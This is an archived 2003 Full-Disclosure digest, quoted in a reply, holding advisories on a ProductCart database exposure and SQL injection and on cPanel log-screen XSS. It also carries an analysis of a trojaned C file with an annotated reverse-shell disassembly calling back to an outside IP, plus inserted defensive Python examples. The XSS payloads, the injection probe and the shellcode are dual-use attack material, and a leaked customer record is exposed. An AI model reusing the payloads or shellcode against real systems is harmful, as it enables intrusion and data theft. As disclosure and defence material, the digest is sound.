Full Disclosure mailing list archives
Re: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #933 - 11 msgs
From: security snot <booger () unixclan net>
Date: Sun, 6 Jul 2003 11:31:21 -0700 (PDT)
Guys - Could we please limit the length of included replies on this list, to something sane? Quoting the entire thread is very annoying.

Thanks.

-----------------------------------------------------------
"Whitehat by day, booger at night - I'm the security snot."
- CISSP / CCNA / A+ Certified - www.unixclan.net/~booger/ -
-----------------------------------------------------------

On Sun, 6 Jul 2003, Markus Nielsen wrote:
On Sun, 2003-07-06 at 16:00, full-disclosure-request () lists netsys com wrote:

Send Full-Disclosure mailing list submissions to
    full-disclosure () lists netsys com

To subscribe or unsubscribe via the World Wide Web, visit
    http://lists.netsys.com/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
    full-disclosure-request () lists netsys com

You can reach the person managing the list at
    full-disclosure-admin () lists netsys com

When replying, please edit your Subject line so it is more specific than "Re: Contents of Full-Disclosure digest..."

Today's Topics:

   1. [Vulnerability] : ProductCart database file can be downloaded remotely (Tri Huynh)
   2. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (gyrniff)
   3. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (KF)
   4. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (morning_wood)
   5. cPanel Malicious HTML Tags Injection Vulnerability (Ory Segal)
   6. cPanel Malicious HTML Tags Injection Vulnerability (Ory Segal)
   7. Re: tripbid secure codes (Dave Korn)
   8. Re: [Vulnerability] : ProductCart database file can be downloaded remotely (Larry W. Cashdollar)
   9. Re: Microsoft Cries Wolf ( again ) (Kristian Hermansen)

--__--__--

Message: 1
From: "Tri Huynh" <trihuynh () zeeup com>
To: <bugtraq () securityfocus com>
Cc: <full-disclosure () lists netsys com>
Date: Sat, 5 Jul 2003 13:07:51 -0700
Subject: [Full-disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
ProductCart database file can be downloaded remotely
=================================================

PROGRAM: ProductCart
HOMEPAGE: http://www.earlyimpact.com/productcart/
VULNERABLE VERSIONS: 1.0 to 2.0
RISK: High

DESCRIPTION
=================================================
ProductCart® is an ASP shopping cart that combines sophisticated ecommerce features with time-saving store management tools and remarkable ease of use. It is widely used by many e-commerce sites.

DETAILS
=================================================
In the default installation, the ProductCart database file is located at /productcart/database/EIPC.mdb, which can be accessed easily by any remote attacker.

Sample: http://victimhost/productcart/database/EIPC.mdb

The database file includes the store administration password as well as customers' info (including credit card info).

WORKAROUND
=================================================
Rename the database file, put it in a protected directory.

CREDITS
=================================================
Discovered by Tri Huynh from Sentry Union

DISCLAIMER
=================================================
The information within this paper may change without notice.
Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

FEEDBACK
=================================================
Please send suggestions, updates, and comments to: trihuynh () zeeup com
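An added example (not ProductCart's code or the advisory's) from the defender's side of this report: after moving the file as the workaround says, the next question is whether anyone already fetched it. This parses IIS W3C Extended log lines (IIS is assumed, since ProductCart is ASP) by their #Fields directive and reports requests for a .mdb path that were answered with 2xx; the log itself is constructed, with only the EIPC.mdb path taken from the advisory.

```python
from typing import Dict, Iterator, List

# Constructed IIS W3C Extended log. The EIPC.mdb path is the one from the
# advisory; client addresses, times and user agents are made up.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-07-05 00:00:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-07-05 13:01:02 192.0.2.10 GET /productcart/pc/home.asp - 200 Mozilla/4.0
2003-07-05 13:01:09 192.0.2.10 GET /productcart/pc/viewPrd.asp idproduct=12 200 Mozilla/4.0
2003-07-05 13:05:44 198.51.100.7 GET /productcart/database/EIPC.mdb - 200 Wget/1.8.2
2003-07-05 13:06:01 198.51.100.7 GET /productcart/database/eipc.MDB - 404 Wget/1.8.2
2003-07-05 13:07:15 203.0.113.5 GET /productcart/database/EIPC.mdb - 206 curl/7.10
2003-07-05 13:08:30 203.0.113.5 GET /productcart/database/EIPC.mdb - 401 curl/7.10
"""


def parse_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per entry, keyed by the names in the #Fields directive.
    Directives can recur mid-file (IIS rewrites them when the log rolls), so
    the field list is replaced whenever a new one appears."""
    fields: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue                      # #Software, #Version, #Date
        if not fields:
            raise ValueError("log entry before any #Fields directive")
        values = line.split(" ")
        if len(values) != len(fields):
            continue                      # malformed entry: skip rather than mis-assign columns
        yield dict(zip(fields, values))


def served_database_files(text: str, suffix: str = ".mdb") -> List[Dict[str, str]]:
    """Entries where a path ending in `suffix` got a 2xx reply, i.e. the file
    (or a byte range of it, 206) actually left the server. 401/403/404 are
    attempts, not disclosures, and are left out here."""
    hits = []
    for entry in parse_w3c(text):
        stem = entry.get("cs-uri-stem", "").lower()
        status = entry.get("sc-status", "")
        if stem.endswith(suffix.lower()) and status.startswith("2"):
            hits.append(entry)
    return hits


def attempts_by_client(text: str, suffix: str = ".mdb") -> Dict[str, int]:
    """Every request for such a path per client, whatever the status, to
    see who was probing even when a 404 or 401 stopped them."""
    counts: Dict[str, int] = {}
    for entry in parse_w3c(text):
        if entry.get("cs-uri-stem", "").lower().endswith(suffix.lower()):
            ip = entry.get("c-ip", "?")
            counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    for hit in served_database_files(SAMPLE_LOG):
        print(hit["date"], hit["time"], hit["c-ip"], hit["cs-method"],
              hit["cs-uri-stem"], "->", hit["sc-status"])
    print(attempts_by_client(SAMPLE_LOG))
```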
--__--__--

Message: 2
From: gyrniff <b240503 () gyrniff dk>
To: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
Date: Sat, 5 Jul 2003 19:37:41 +0200

URL: http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239

Change the name Paul to Paul'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''Paul'',lastName='Smith',customerCompany='Early Impact', address='3226 Colorado Ave', city='Santa Monica', zip='90004', stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
/productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36

have a nice weekend ;-)
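The ODBC error above shows the UPDATE being assembled by pasting form fields straight into SQL, which is why one apostrophe in the first name breaks the statement. The following added example (not ProductCart's code, which is ASP against an Access database; sqlite3 stands in for Access here) rebuilds that update with the column names from the error message, first by concatenation and then with bound parameters; the table name `customers` and the row values are assumptions.

```python
import sqlite3
from typing import Dict, Optional, Tuple

# Column names as they appear in the ODBC error message. The table name
# `customers` and the row contents below are assumptions.
COLUMNS = ("firstName", "lastName", "customerCompany", "address",
           "city", "zip", "stateCode", "CountryCode", "phone")


def setup_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE customers (idCustomer INTEGER PRIMARY KEY, "
                + ", ".join(f"{c} TEXT" for c in COLUMNS) + ")")
    con.execute("INSERT INTO customers (idCustomer, firstName, lastName) "
                "VALUES (115, 'Placeholder', 'Customer')")   # constructed row
    return con


def update_vulnerable(con: sqlite3.Connection, id_customer: int,
                      values: Dict[str, str]) -> None:
    """Statement assembled by string concatenation, the pattern the error
    message reveals: a quote inside any value becomes part of the SQL."""
    assignments = ",".join(f"{c}='{values[c]}'" for c in COLUMNS)
    con.execute(f"UPDATE customers SET {assignments} WHERE idCustomer={id_customer}")


def update_safe(con: sqlite3.Connection, id_customer: int,
                values: Dict[str, str]) -> None:
    """Same update with bound parameters: the values travel to the driver
    separately from the statement text and never reach the SQL parser."""
    assignments = ",".join(f"{c}=?" for c in COLUMNS)
    con.execute(f"UPDATE customers SET {assignments} WHERE idCustomer=?",
                tuple(values[c] for c in COLUMNS) + (id_customer,))


def first_name(con: sqlite3.Connection, id_customer: int) -> str:
    row = con.execute("SELECT firstName FROM customers WHERE idCustomer=?",
                      (id_customer,)).fetchone()
    return row[0]


def demo(name: str) -> Tuple[Optional[str], str]:
    """Run both variants with `name` as firstName. Returns the error text the
    concatenated version raised (None if it ran) and the value the
    parameterised version stored."""
    values = {c: "x" for c in COLUMNS}
    values["firstName"] = name
    con = setup_db()
    error = None
    try:
        update_vulnerable(con, 115, values)
    except sqlite3.OperationalError as exc:
        error = str(exc)   # sqlite's counterpart of the ODBC 80040e14 syntax error
    update_safe(con, 115, values)
    return error, first_name(con, 115)


if __name__ == "__main__":
    print(demo("Paul"))
    print(demo("Paul'"))
```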
--__--__--

Message: 3
Date: Sat, 05 Jul 2003 15:30:28 -0400
From: KF <dotslash () snosoft com>
To: gyrniff <b240503 () gyrniff dk>
CC: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely

Was that legit California data? I am sure that making someone have a nice weekend you just made multiple someones have a shitty month ahead of them...
http://www.theregister.co.uk/content/55/31509.html

-KF
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

--__--__--

Message: 4
From: "morning_wood" <se_cur_ity () hotmail com>
To: "gyrniff" <b240503 () gyrniff dk>, <full-disclosure () lists netsys com>
Subject: Re: [Full-disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely
Date: Sat, 5 Jul 2003 15:24:46 -0700

vuln to XSS too..
http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/manageCategories.asp
--__--__--

Message: 5
From: Ory Segal <ORY.SEGAL () SANCTUMINC COM>
To: "BugTraq (E-mail)" <BUGTRAQ () SECURITYFOCUS COM>, "Full Disclosure (E-mail)" <full-disclosure () lists netsys com>, "WebAppSec (E-mail)" <webappsec () SECURITYFOCUS COM>
Date: Sun, 6 Jul 2003 01:39:33 -0700
Subject: [Full-disclosure] cPanel Malicious HTML Tags Injection Vulnerability
///////////////////////////////////////////////////////////////////////////////
//==========================>> Security Advisory <<==========================//
///////////////////////////////////////////////////////////////////////////////

-------------------------------------------------------------------------------
-----[ cPanel Malicious HTML Tags Injection Vulnerability
-------------------------------------------------------------------------------

--[ Author: Ory Segal, Sanctum inc. http://www.SanctumInc.com
--[ Discovery Date: 06/17/2003 (Vendor was notified)
--[ Release Date: 07/06/2003
--[ Product: Tested on cPanel 6.4.2-STABLE
--[ Severity: Medium
--[ CVE: Not assigned yet

--[ Summary

From the vendor's web site:
"...The Cpanel interface is a client side interface, which allows your customers to easily control a web hosting account. With the touch of a button, they can add e-mail accounts, access their files, backup their files, setup a shopping cart, and more..."

Web users can embed malicious HTML tags in HTTP requests, which will later be parsed by the web site administrator's browser, in several cPanel screens. This may lead to theft of cookies associated with the domain, or execution of client-side scripts in the administrator's browser.

--[ Description

The 'Error Log' and 'Latest Visitors' screens in cPanel provide the web site administrator with HTTP request logs. These scripts do not sanitize the URL part of HTTP requests and present them to the administrator as is, thus allowing an attacker to embed malicious HTML tags that will later be parsed and executed by the administrator's browser.

For example, let's take a look at the 'Error Log' screen:

[From errlog.html]
...
<b>Last 300 Error Log Messages in reverse order:</b><hr>
<pre>
[Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist: /home/dir/public_html/foobar.html
</pre>
...

The following request will present a pop-up screen with the cookies that are currently associated with the domain:

GET /<script>alert(document.cookie);</script> HTTP/1.0
Host: www.site.com

--[ Note

The 'Latest Visitors' screen of the tested version (6.4.2-STABLE) presented the latest requests as HTML links, thus the malicious payload must terminate the <a> tag before opening a new one. For example:

GET /"></a><script>alert(document.cookie);</script> HTTP/1.0
Host: www.site.com

--[ Solution

According to the vendor, the problem was fixed in version 7.0, which can be downloaded at: http://www.cpanel.net/downloads.htm

Ory Segal
Senior Security Engineer
Sanctum, Inc.
http://www.SanctumInc.Com/

Ampa Bldg., 1 Sapir Street.
Mail: P.O.Box 12047
Herzliya 46733, ISRAEL

Tel: +972-9-9586077 Ext. 236
Fax: +972-9-9576337
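An added example, not cPanel's code, of the fix the advisory calls for: request URIs from the logs are escaped for the two output contexts it describes, text inside <pre> (the 'Error Log' screen) and the href attribute plus text of an <a> (the 'Latest Visitors' screen, where the second payload relies on an unescaped quote to close the tag). The log entries are constructed around the advisory's own sample line and its two request URIs, and a small self-check lists any tag that did not come from the template.

```python
import html
import re
from typing import List, Set

# Constructed log data. The first entry is the advisory's errlog.html sample;
# the tainted entries carry the advisory's two request URIs, as Apache's
# error log and cPanel's visitor list would have recorded them.
ERROR_LOG = [
    "[Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist: /home/dir/public_html/foobar.html",
    "[Tue Jun 17 08:42:03 2003] [error] [client x.x.x.x] File does not exist: /home/dir/public_html/<script>alert(document.cookie);</script>",
]
LATEST_VISITORS = [
    "/index.html",
    '/"></a><script>alert(document.cookie);</script>',
]

TAG_RE = re.compile(r"</?([A-Za-z][A-Za-z0-9]*)[^>]*>")


def render_error_log(lines: List[str]) -> str:
    """'Error Log' screen: entries are text inside <pre>, so '<', '>' and
    '&' must become entities before the browser sees them."""
    body = "\n".join(html.escape(line, quote=True) for line in lines)
    return ("<b>Last 300 Error Log Messages in reverse order:</b><hr>\n"
            "<pre>\n" + body + "\n</pre>")


def render_latest_visitors(paths: List[str]) -> str:
    """'Latest Visitors' screen: each path is both an href value and the
    link text. quote=True also escapes the double quote, so a path starting
    with a quote and a closing tag cannot break out of the attribute."""
    items = []
    for path in paths:
        safe = html.escape(path, quote=True)
        items.append(f'<a href="{safe}">{safe}</a>')
    return "<br>\n".join(items)


def foreign_tags(rendered: str, template_tags: Set[str]) -> List[str]:
    """Self-check for a rendered screen: any tag the template itself does
    not emit came from data, i.e. escaping was skipped somewhere."""
    return [m.group(0) for m in TAG_RE.finditer(rendered)
            if m.group(1).lower() not in template_tags]


if __name__ == "__main__":
    print(render_error_log(ERROR_LOG))
    print(render_latest_visitors(LATEST_VISITORS))
```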
--__--__--

Message: 6
Date: Sun, 06 Jul 2003 11:46:44 +0300
From: Ory Segal <ory.segal () sanctuminc com>
To: BUGTRAQ () SECURITYFOCUS COM, full-disclosure () lists netsys com, webappsec () SECURITYFOCUS COM
Subject: [Full-disclosure] cPanel Malicious HTML Tags Injection Vulnerability
--__--__--

Message: 7
From: "Dave Korn" <davek_throwaway () hotmail com>
To: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] tripbid secure codes
Date: Sun, 06 Jul 2003 12:23:01 +0000

----- Original Message -----
From: <auto94042 () hushmail com>
To: <full-disclosure () lists netsys com>
Sent: Friday, June 27, 2003 6:25 AM
Subject: [Full-disclosure] tripbid secure codes

i post the thing to the vuln dev some days ago and get quite a big response. not only do i get a heart 2 heart with n1xo reiman about portmon ! but some folks want me to look at the code they make, specially a 'hello-world.c' progie -> " holo, can you check my hello-world.c for strcpy ?? securecode do the trick " <- paraphrase the msg, i rm -rf / it since it make me anger and stress it ! i am willing to try the secure code since the grep 'strcpy' is losing his thrills so i trick around with :

[user@localhost]$ ./securecode -s hello-world.c

Never ever EVER run an insecure program over arbitrary data you receive from the net without checking it for safety first..... Let's look at this hello-world.c before we run anything on it....

Z:\sploits-misc\targzip>type hello-world.c
Heh. Boy, did j00 get hax0red! Here's what's actually in that file:

$0000 - $00ff: 'A' x 256
$0100 - $011f: DWORD $bffff321 x 8
$0120 - $0378: $90 = NOP x 600
$0378 - $03fa: Binary shellcode
$03fb - $03fc: CR, LF
<EOF>

In other words, it's one very long line. Looks to me like the securecode program reads each line of the .c file into a buffer that's only 256 bytes long; this exploit fills it with 'A', then overwrites the return address on the stack with a pointer into the NOP slide.

Here's a disassembly of the shellcode: note that offset 0 in this disassembly is offset $0370 in the file. Sorry for not commenting this, but I don't speak linux asm; however I can see a whole bunch of syscalls going on in there; the values in eax should tell you whether anything nastier than a few mkdirs was done to you...
Z:\sploits-misc\targzip>objdump -D --target=binary hello-world2.bin --architecture=i386

hello-world2.bin:     file format binary
objdump: hello-world2.bin: no symbols

Disassembly of section .data:

00000000 <.data>:
   0:   90                      nop
   1:   90                      nop
   2:   90                      nop
   3:   90                      nop
   4:   90                      nop
   5:   90                      nop
   6:   90                      nop
   7:   90                      nop
   8:   90                      nop
   9:   31 c0                   xor    %eax,%eax
   b:   31 db                   xor    %ebx,%ebx
   d:   31 c9                   xor    %ecx,%ecx
   f:   51                      push   %ecx
  10:   b1 06                   mov    $0x6,%cl
  12:   51                      push   %ecx
  13:   b1 01                   mov    $0x1,%cl
  15:   51                      push   %ecx
  16:   b1 02                   mov    $0x2,%cl
  18:   51                      push   %ecx
  19:   89 e1                   mov    %esp,%ecx
  1b:   b3 01                   mov    $0x1,%bl
  1d:   b0 66                   mov    $0x66,%al
  1f:   cd 80                   int    $0x80            # socketcall(SYS_SOCKET): socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
  21:   89 c2                   mov    %eax,%edx        # edx = socket fd
  23:   31 c0                   xor    %eax,%eax
  25:   31 c9                   xor    %ecx,%ecx
  27:   51                      push   %ecx
  28:   51                      push   %ecx
  29:   68 d4 62 f7 cc          push   $0xccf762d4      # sin_addr, bytes d4 62 f7 cc = 212.98.247.204
  2e:   66 68 b0 ef             pushw  $0xefb0          # sin_port, bytes b0 ef = tcp/45295
  32:   b1 02                   mov    $0x2,%cl
  34:   66 51                   push   %cx              # sin_family = AF_INET
  36:   89 e7                   mov    %esp,%edi
  38:   b3 10                   mov    $0x10,%bl
  3a:   53                      push   %ebx
  3b:   57                      push   %edi
  3c:   52                      push   %edx
  3d:   89 e1                   mov    %esp,%ecx
  3f:   b3 03                   mov    $0x3,%bl
  41:   b0 66                   mov    $0x66,%al
  43:   cd 80                   int    $0x80            # socketcall(SYS_CONNECT): connect(fd, &sockaddr_in, 16)
  45:   31 c9                   xor    %ecx,%ecx
  47:   39 c1                   cmp    %eax,%ecx        # did connect return 0?
  49:   74 06                   je     0x51
  4b:   31 c0                   xor    %eax,%eax
  4d:   b0 01                   mov    $0x1,%al
  4f:   cd 80                   int    $0x80            # no: exit(1)
  51:   31 c0                   xor    %eax,%eax
  53:   b0 3f                   mov    $0x3f,%al
  55:   89 d3                   mov    %edx,%ebx
  57:   cd 80                   int    $0x80            # dup2(fd, 0)
  59:   31 c0                   xor    %eax,%eax
  5b:   b0 3f                   mov    $0x3f,%al
  5d:   89 d3                   mov    %edx,%ebx
  5f:   b1 01                   mov    $0x1,%cl
  61:   cd 80                   int    $0x80            # dup2(fd, 1)
  63:   31 c0                   xor    %eax,%eax
  65:   b0 3f                   mov    $0x3f,%al
  67:   89 d3                   mov    %edx,%ebx
  69:   b1 02                   mov    $0x2,%cl
  6b:   cd 80                   int    $0x80            # dup2(fd, 2)
  6d:   31 c0                   xor    %eax,%eax
  6f:   31 d2                   xor    %edx,%edx
  71:   50                      push   %eax
  72:   68 6e 2f 73 68          push   $0x68732f6e      # "n/sh"
  77:   68 2f 2f 62 69          push   $0x69622f2f      # "//bi" -> "//bin/sh\0" on the stack
  7c:   89 e3                   mov    %esp,%ebx
  7e:   50                      push   %eax
  7f:   53                      push   %ebx
  80:   89 e1                   mov    %esp,%ecx
  82:   b0 0b                   mov    $0xb,%al
  84:   cd 80                   int    $0x80            # execve("//bin/sh", ["//bin/sh", NULL], NULL): shell on the connected socket
  86:   31 c0                   xor    %eax,%eax
  88:   b0 01                   mov    $0x1,%al
  8a:   cd 80                   int    $0x80            # exit(0)
  8c:   0d                      .byte 0xd
  8d:   0a                      .byte 0xa

DaveK
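DaveK's advice is to look at a file before any tool reads it, and his layout (a line far past 256 bytes, a stack address repeated eight times, a 600-byte NOP slide) is exactly the kind of structure that can be checked mechanically. This added example, not from the post and not securecode's code, reports those three features per line; its sample file is constructed to the post's layout, with 0xCC filler where the shellcode was.

```python
import struct
from dataclasses import dataclass
from typing import List, Tuple

LINE_LIMIT = 256   # buffer size DaveK infers for securecode's line reader
NOP = 0x90
MIN_SLED = 32      # shortest 0x90 run worth reporting
MIN_REPEAT = 4     # a dword must repeat at least this often to count


def looks_like_address(value: int) -> bool:
    """True when the dword has a byte outside printable ASCII, i.e. it is
    not just repeated text such as 'AAAA' or a run of spaces."""
    return any(not 0x20 <= b < 0x7F for b in value.to_bytes(4, "little"))


def longest_byte_run(data: bytes, value: int) -> int:
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best


def repeated_dwords(data: bytes) -> List[Tuple[int, int, int]]:
    """Runs of one little-endian dword repeated MIN_REPEAT+ times, as
    (offset, count, value). All four alignments are scanned so the padding
    length does not matter; a run overlapping an earlier, longer one is
    dropped so each region is reported once."""
    runs = []
    for align in range(4):
        start, prev, count = align, None, 0
        for i in range(align, len(data) - 3, 4):
            value = struct.unpack_from("<I", data, i)[0]
            if value == prev:
                count += 1
                continue
            if count >= MIN_REPEAT:
                runs.append((start, count, prev))
            start, prev, count = i, value, 1
        if count >= MIN_REPEAT:
            runs.append((start, count, prev))
    kept: List[Tuple[int, int, int]] = []
    for start, count, value in sorted(runs, key=lambda r: (r[0], -r[1])):
        end = start + 4 * count
        if not any(s < end and start < s + 4 * c for s, c, _ in kept):
            kept.append((start, count, value))
    return kept


@dataclass
class LineReport:
    number: int
    length: int
    repeated: List[Tuple[int, int, int]]
    longest_nop_run: int

    @property
    def suspicious(self) -> bool:
        return (self.length > LINE_LIMIT
                or self.longest_nop_run >= MIN_SLED
                or any(looks_like_address(v) for _, _, v in self.repeated))


def analyze(data: bytes) -> List[LineReport]:
    """One report per LF-delimited line (trailing CR stripped), mirroring
    how a line-at-a-time reader would consume the file."""
    return [LineReport(n, len(line), repeated_dwords(line),
                       longest_byte_run(line, NOP))
            for n, raw in enumerate(data.split(b"\n"), start=1)
            for line in [raw.rstrip(b"\r")]]


def build_sample() -> bytes:
    """Constructed file with the post's layout: 256 x 'A', 8 x $bffff321,
    600 x NOP, 131 bytes of inert filler in place of the shellcode, CR LF."""
    return (b"A" * 256 + struct.pack("<I", 0xBFFFF321) * 8
            + bytes([NOP]) * 600 + b"\xcc" * 0x83 + b"\r\n")


# An ordinary hello-world source, for contrast.
BENIGN = b'#include <stdio.h>\nint main(void) { puts("hello, world"); return 0; }\n'

if __name__ == "__main__":
    for r in analyze(build_sample()) + analyze(BENIGN):
        print(r.number, r.length, r.repeated, r.longest_nop_run,
              "SUSPICIOUS" if r.suspicious else "ok")
```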
--__--__--

Message: 8
Date: Sun, 6 Jul 2003 11:07:22 -0400 (EDT)
From: "Larry W. Cashdollar" <lwc () vapid ath cx>
To: <full-disclosure () lists netsys com>
Subject: Re: [Full-disclosure] [Vulnerability] : ProductCart database file can be downloaded remotely

949 is a legit zip code in cali.

On Sat, 5 Jul 2003, KF wrote:

Was that legit California data? I am sure that making someone have a nice weekend you just made multiple someones have a shitty month ahead of them...

http://www.theregister.co.uk/content/55/31509.html

-KF

gyrniff wrote:

URL: http://www.earlyimpact.com/productcart/build_to_order/productcart/pcadmin/Orddetails.asp?id=239

Change the name Paul to Paul'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ''Paul'',lastName='Smith',customerCompany='Early Impact', address='3226 Colorado Ave', city='Santa Monica', zip='90004', stateCode='CA', CountryCode='US', phone='949 452 0062' WHERE idCustomer=115'.
/productcart/build_to_order/productcart/pcadmin/processOrder.asp, line 36

have a nice weekend ;-)

On Saturday 05 July 2003 22:07, Tri Huynh wrote:

ProductCart database file can be downloaded remotely
=================================================
PROGRAM: ProductCart
HOMEPAGE: http://www.earlyimpact.com/productcart/
VULNERABLE VERSIONS: 1.0 to 2.0
RISK: High

DESCRIPTION
=================================================
ProductCart® is an ASP shopping cart that combines sophisticated ecommerce features with time-saving store management tools and remarkable ease of use. It is widely used by many e-commerce sites.

DETAILS
=================================================
In the default installation, the ProductCart database file is located at /productcart/database/EIPC.mdb, which can be accessed easily by any remote attacker.
Sample: http://victimhost/productcart/database/EIPC.mdb

The database file includes the store administration password as well as customers' info (including credit card info).

WORKAROUND
=================================================
Rename the database file and put it in a protected directory.

CREDITS
=================================================
Discovered by Tri Huynh from Sentry Union

DISCLAIMER
=================================================
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

FEEDBACK
=================================================
Please send suggestions, updates, and comments to: trihuynh () zeeup com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

--__--__--

Message: 9
From: "Kristian Hermansen" <this_is_kris () hotmail com>
To: <full-disclosure () lists netsys com>
Subject: Re: [Full-disclosure] Microsoft Cries Wolf ( again )
Date: Tue, 1 Jul 2003 22:49:59 -0400

Yes, programmers should be trained to write better code...but it is more profitable to allow sloppy code and a simple fix later (behind the scenes with vendor notification). This is MS's point of view. This is why they want vendor notification, rather than public notification. Again, I say let the 0-days fly. Did you know that certain US government agencies have teams whose only job is to break software? This has been going on since the 1970s.
It helps to produce secure code in mission critical applications that the military needs. I am not saying that MS needs to be SO drastic...but a small team for their MOST popular products would sure be wise to start with. Why not hire fucking intern teenagers from russia to "Crash Test" their development projects (facetious)? Would it be so difficult/expensive to hire some of the main companies that are breaking your software???

Kris Hermansen

----- Original Message -----
From: "Schmehl, Paul L" <pauls () utdallas edu>
To: <full-disclosure () lists netsys com>
Sent: Tuesday, July 01, 2003 6:58 PM
Subject: RE: [Full-disclosure] Microsoft Cries Wolf ( again )

-----Original Message-----
From: Kristian Hermansen [mailto:this_is_kris () hotmail com]
Sent: Tuesday, July 01, 2003 3:09 PM
To: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Microsoft Cries Wolf ( again )

I agree. It is not our problem. The reason is this. Microsoft would like to reduce costs. Fixing bugs in products costs money, and 0-day bugs need immediate fixes, which slow down MS's total output ability. They would like to see everyone reporting to the vendor first because this saves them money!!! In this respect, this also allows them to go on writing sloppy code in order to save a few bucks on every product, thus reducing their overhead. I don't want sloppy code. Let the 0-days fly....maybe MS will start doing extensive testing of their products before they release them for sale to millions of customers. I thought .NET was supposed to fix all this ;-P

That's too funny. Microsoft ran a "buffer overflow finder" against the codebase for XP, and the VP in charge announced publicly that they had "eliminated buffer overflows in XP". Within thirty days, eEye announced the UPnP vulnerability in SSDP, which is the single most devastating hole ever found in MS products. (You can compromise an entire network of XP machines with one attack, simultaneously.) You don't fix code by extensive testing.
You fix it by teaching how to write secure code to begin with *and* by ongoing, consistent audits done before code is released. (OpenBSD has been doing this for years, and look at the results.)

Paul Schmehl (pauls () utdallas edu)
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/~pauls/

--__--__--

_______________________________________________
Full-Disclosure mailing list
Full-Disclosure () lists netsys com
http://lists.netsys.com/mailman/listinfo/full-disclosure

End of Full-Disclosure Digest

--
Markus Nielsen <intercool () sexmagnet com>